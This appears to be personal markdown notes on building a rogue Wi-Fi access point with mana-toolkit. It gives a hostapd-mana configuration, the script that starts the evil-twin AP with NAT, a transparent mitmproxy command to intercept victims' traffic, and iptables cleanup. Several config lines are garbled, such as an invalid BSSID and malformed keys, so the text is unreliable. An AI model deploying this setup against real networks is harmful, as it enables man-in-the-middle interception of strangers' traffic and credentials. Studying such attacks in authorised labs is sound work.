# Creating a rogue AP **edit in configuration file `etc/mana-toolkit/hostapd-mana.conf`** ```bash interface, SSID, channel, BSSID ``` * **improved version from `hostapd-mana.conf`** ```bash interface=wlan0 hw_mode=g channel=10 ieee80211d=1 country_code=GY ieee80211n=1 wmm_enabled=1 driver=nl80211 ssid=mirage21 auth_algs=1 wpa=2 wpa_key_mgmt=WPA-PSK rsn_pairwise=CCMP wpa_passphrase=somepassword bssid=30:b4:a1:37:fo:fo # Prevent dissasociations disassoc low_ack=0 ap_max_inactivity-3000 # no SSID cloaking #ignore_broadcast_ssid=0 #1 log all messages logger syslog=-1 logger stdout=-1 #2 informational messages logger syslog_level=2 logger stdout_level=2 ctrl interface=/var/run/hostapd ctrl interface_group=0 # Finally, enable mana #enable mana=1 # Limit mana to responding only to the device probing (0), or not (1) #mana Loud=0 # Extend MAC ACLS to probe frames #mana macacl=e # Put hostapd in white/black list mode #macaddr_acl=0 # only used if you want to do filter by MAC address #accept_mac_file=/etc/mana-toolkit/hostapd.accept #deny_mac_file=/etc/mana-toolkit/hostapd.deny ``` then run mana-toolkit ```bash cd /usr/share/mana-toolkit/run-mana sudo ./start-nat-simple.sh ``` **run proxy** ```bash mitmproxy --mode transparent --showhost ``` show dns logs ```bash tail -f /tmp/dnsmasq.log ```

> action refused → because it try to connect to SSL certificate but not found it *** #### Return all settings to default ```bash systemctl restart NetworkManager systemctl restart apache2 iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain systemctl start NetworkManager ```